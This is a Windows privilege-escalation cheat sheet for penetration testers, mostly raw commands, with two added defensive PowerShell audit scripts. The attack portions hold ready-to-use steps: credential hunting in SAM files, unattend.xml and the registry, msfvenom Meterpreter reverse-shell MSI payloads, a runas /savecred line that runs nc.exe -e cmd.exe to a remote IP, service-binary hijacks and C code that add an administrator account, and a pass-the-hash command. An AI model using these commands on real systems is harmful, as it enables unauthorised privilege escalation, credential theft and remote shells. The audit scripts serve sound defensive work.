[TOC]
hostname
systeminfo
whoami
If any directory in the SYSTEM %PATH% variable is writable by Authenticated Users, a privesc path exists.
Many applications don't use full paths when loading executables or DLLs, so they search %PATH% in order.
If system32 is not the first entry in the path, that is bad.
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
wmic product get name, version, vendor
systeminfo
wmic qfe get Caption,Description,HotFixID,InstalledOn
whoami
echo %USERNAME%
net user %USERNAME%
List all Local Users
net user
List all Local Groups
net localgroup
Check who is a member of the local group "Administrators"
net localgroup Administrators
Adding users and groups
net user kali kali1234 /add
net localgroup administrators kali /add
net localgroup "Remote Desktop Users" kali /add
Users in a domain
net user /domain
Groups in a domain
net group /domain
net group /domain <Group Name>
wmic useraccount where (name='Guest') get name,sid
netsh firewall show state
netsh firewall show config
netsh advfirewall show currentprofile
netsh advfirewall firewall show rule name=all
ipconfig /all
route print
arp -A
netstat -ano
accesschk.exe -uws "Everyone" "C:\Program Files"
Get-ChildItem "C:\Program Files" -Recurse | Get-ACL | ?{$_.AccessToString -match "Everyone\sAllow\s\sModify"}
mountvol
mountvol c:\test \\?\Volume{93131ba8-0000-0000-0000-100000000000}\
powershell
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
Get-WmiObject Win32_PnPSignedDriver | Select-Object DeviceName, DriverVersion, Manufacturer | Where-Object {$_.DeviceName -like "*VMware*"}
If these are set we could run an msi to elevate privileges
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
schtasks /query /fo LIST
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v
Copy the output and save it as a txt file on the Kali machine:
cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
dir c:\windows\tasks\
dir c:\windows\system32\tasks\
schtasks /query /v /fo list /tn "\System Maintenance"
https://pentestlab.blog/tag/privilege-escalation/page/3/
If there are entries, we may be able to runas a certain user whose credentials are stored in Windows Credential Manager
cmdkey /list
runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \\IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
findstr /si password *.xml *.ini *.txt
findstr /si pass/pwd *.ini
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /spin "password" *.*
c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
dir /b /s unattend.xml
dir /b /s web.config
dir /b /s sysprep.inf
dir /b /s sysprep.xml
dir /b /s *pass*
dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b
dir c:\ /s /b | findstr /si *vnc.ini
reg query "HKCU\Software\ORL\WinVNC3\Password"
reg query "HKCU\Software\TightVNC\Server"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
On 64-bit systems use: %SystemRoot%\Sysnative\reg.exe
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
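Added audit script, not from the original cheat sheet: it evaluates the two AlwaysInstallElevated values queried above (the weakness requires BOTH the HKLM and HKCU value to be 1, a single one is harmless) and the Winlogon auto-logon values from the earlier reg query, printing a finding and the fix for each. Get-RegValue is a small helper defined here, not a built-in cmdlet; the output wording is mine.

```powershell
# Added audit example, not from the original cheat sheet.
function Get-RegValue {
    param([string]$Path, [string]$Name)
    # $null when the key or value is absent, instead of a terminating error
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name } catch { $null }
}

# AlwaysInstallElevated: only the combination of both hives set to 1 is exploitable
$installer = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$hklm = Get-RegValue "HKLM:\$installer" 'AlwaysInstallElevated'
$hkcu = Get-RegValue "HKCU:\$installer" 'AlwaysInstallElevated'
if ($hklm -eq 1 -and $hkcu -eq 1) {
    Write-Output '[FAIL] AlwaysInstallElevated=1 in HKLM and HKCU: any MSI this user installs runs as SYSTEM'
    Write-Output '       fix: disable "Always install with elevated privileges" (Windows Installer admin template) in both Computer and User Configuration'
} else {
    Write-Output "[ok]   AlwaysInstallElevated HKLM=$hklm HKCU=$hkcu (both must be 1 for the weakness to exist)"
}

# Winlogon auto-logon keeps the account password in plaintext, readable by every local user
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$defaultPw = Get-RegValue $winlogon 'DefaultPassword'
if ($defaultPw) {
    # report the account, never the password value itself
    $acct = "$(Get-RegValue $winlogon 'DefaultDomainName')\$(Get-RegValue $winlogon 'DefaultUserName')"
    Write-Output "[FAIL] Winlogon DefaultPassword is set for $acct (AutoAdminLogon=$(Get-RegValue $winlogon 'AutoAdminLogon'))"
    Write-Output '       fix: clear DefaultPassword; if auto-logon is needed, Sysinternals Autologon stores the secret as an LSA secret instead'
} else {
    Write-Output '[ok]   no Winlogon DefaultPassword'
}
```

Run it in a normal (non-elevated) PowerShell as the user being assessed: the HKCU half of the AlwaysInstallElevated check is per-user, so an elevated console belonging to a different account answers a different question.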
Kali VM
1. Open command prompt and type: msfconsole
2. In Metasploit (msf > prompt) type: use multi/handler
3. In Metasploit (msf > prompt) type: set payload windows/meterpreter/reverse_tcp
4. In Metasploit (msf > prompt) type: set lhost [Kali VM IP Address]
5. In Metasploit (msf > prompt) type: run
6. Open an additional command prompt and type: msfvenom -p windows/meterpreter/reverse_tcp lhost=[Kali VM IP Address] -f msi -o setup.msi
7. Copy the generated file, setup.msi, to the Windows VM.
1. Place 'setup.msi' in 'C:\Temp'.
2. Open command prompt and type: msiexec /quiet /qn /i C:\Temp\setup.msi
Requires powershell
Get-WmiObject win32_service | Select-Object Name, State, PathName | Where-Object {$_.State -like 'Running'} | findstr /v /i "Microsoft" | findstr /v /i "windows" | findstr /v /i "vmware"
wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Note: On an x64 machine you should use bat2exe.bat to create a 64-bit executable
1. Open command prompt and type: msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o common.exe
2. Copy the generated file, common.exe, to the Windows VM.
1. Place common.exe in 'C:\Program Files\Unquoted Path Service'.
2. Open command prompt and type: sc start unquotedsvc
3. It is possible to confirm that the user was added to the local administrators group by typing the following in the command prompt: net localgroup administrators
wmic service where caption="Serviio" get name, caption, state, startmode
accesschk.exe -uwcqv * /accepteula
Find Services that can be modified
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Power Users" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
icacls "C:\Program Files\Serviio\bin\ServiioService.exe"
for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\service_exes.txt
echo "" > c:\windows\temp\exe_permissions.txt
for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\service_exes.txt) do cmd.exe /c icacls "%a" >> c:\windows\temp\exe_permissions.txt
sc qc <Service Name>
accesschk.exe -ucqv <Service Name>
sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt
FOR /F %i in (Servicenames.txt) DO echo %i
FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt
FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt
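Added audit script, not from the original cheat sheet, that combines two of the checks on this page: it reads the same Session Manager\Environment PATH value as the reg query near the top and flags entries a low-privileged principal can write to (warning if System32 is not first), then walks every service, parses the binary out of Win32_Service.PathName, reports binaries with weak ACLs, and for unquoted paths containing spaces checks whether any intermediate directory Windows would search (C:\Program.exe, C:\Program Files\Unquoted.exe, ...) is writable. The principal list and the rights mask are my choices, Test-LowPrivWritable is a helper defined here rather than a built-in cmdlet, and the sc config line it prints is the standard remediation for an unquoted path.

```powershell
# Added audit example, not from the original cheat sheet.

# Principals that should never hold write rights on a PATH directory or a service binary
$lowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
# Rights that let a caller plant or replace a file: create/write data, change the ACL, take
# ownership, plus the GENERIC_ALL / GENERIC_WRITE bits that show up in some inherited ACEs
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, ChangePermissions, TakeOwnership' -bor 0x10000000 -bor 0x40000000

function Test-LowPrivWritable {
    param([string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        # skip inherit-only ACEs (PropagationFlags bit 2): they apply to children, not to this object
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }
        if ($ace.AccessControlType -eq 'Allow' -and
            $lowPriv -contains $ace.IdentityReference.Value -and
            (([int]$ace.FileSystemRights) -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

# --- 1. system PATH (the same registry value the reg query near the top reads) ---
$envKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Environment'
$entries = @((Get-ItemProperty -Path $envKey -Name Path).Path -split ';' |
    Where-Object { $_.Trim() -ne '' } |
    ForEach-Object { [Environment]::ExpandEnvironmentVariables($_.Trim()).TrimEnd('\') })

$system32 = Join-Path $env:SystemRoot 'System32'
if ($entries.Count -eq 0 -or $entries[0] -ine $system32) {
    Write-Output "[WARN] first PATH entry is '$($entries[0])', expected '$system32'"
}
for ($i = 0; $i -lt $entries.Count; $i++) {
    $dir = $entries[$i]
    if (-not (Test-Path -LiteralPath $dir -PathType Container)) {
        # a missing directory is a finding too: whoever can create it controls its contents
        Write-Output "[WARN] PATH #$($i+1) $dir does not exist"
    } elseif (Test-LowPrivWritable $dir) {
        Write-Output "[FAIL] PATH #$($i+1) $dir is writable by a low-privileged principal"
    }
}

# --- 2. services: writable binaries and unquoted paths ---
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    $cmd = $svc.PathName
    if ([string]::IsNullOrWhiteSpace($cmd)) { continue }

    if ($cmd.StartsWith('"')) {
        # quoted: the binary is whatever sits between the first pair of quotes
        $close = $cmd.IndexOf('"', 1)
        if ($close -lt 1) { continue }
        $exe = $cmd.Substring(1, $close - 1)
    } else {
        # unquoted: the binary is everything up to the first .exe token
        $m = [regex]::Match($cmd, '^(.*?\.exe)(\s|$)', 'IgnoreCase')
        $exe = if ($m.Success) { $m.Groups[1].Value } else { ($cmd -split ' ')[0] }
        if ($exe.Contains(' ')) {
            # Windows resolves C:\Program Files\Unquoted Path Service\common.exe by trying
            # C:\Program.exe, then C:\Program Files\Unquoted.exe, and so on, before the real file
            $parts = $exe.Split(' ')
            for ($n = 1; $n -lt $parts.Count; $n++) {
                $candidate = ($parts[0..($n-1)] -join ' ') + '.exe'
                $parent = Split-Path -Path $candidate -Parent
                if ($parent -and (Test-LowPrivWritable $parent)) {
                    Write-Output "[FAIL] service $($svc.Name): unquoted path '$exe', $parent is writable (would resolve $candidate first)"
                    Write-Output "       fix: sc config $($svc.Name) binPath= `"\`"$exe\`"`""
                }
            }
        }
    }
    $exe = [Environment]::ExpandEnvironmentVariables($exe)

    if (Test-LowPrivWritable $exe) {
        Write-Output "[FAIL] service $($svc.Name): binary $exe is writable (start=$($svc.StartMode), account=$($svc.StartName))"
    }
}
```

Run it from an elevated PowerShell on the host being audited so Get-Acl can read every service directory. The inherit-only filter matters: the default ACL on C:\ grants Authenticated Users an inherit-only Modify ACE that applies to new subfolders but not to C:\ itself, so without that filter every unquoted Program Files path would be reported as a false positive at C:\Program.exe.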
Check permissions on the file (look for a W or F tag in the icacls output) and substitute the binary if possible
icacls scsiaccess.exe
subinacl /keyreg HKEY_LOCAL_MACHINE/software/microsoft
Write and compile a malicious exe file that adds a user to the system as an admin
#include <stdlib.h>
int main ()
{
int i;
i = system ("net user evil Ev!lpass /add");
i = system ("net localgroup administrators evil /add");
return 0;
}
sudo i686-w64-mingw32-gcc adduser.c -o adduser.exe
Use the NTLM hash to authenticate
pth-winexe -U offsec%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd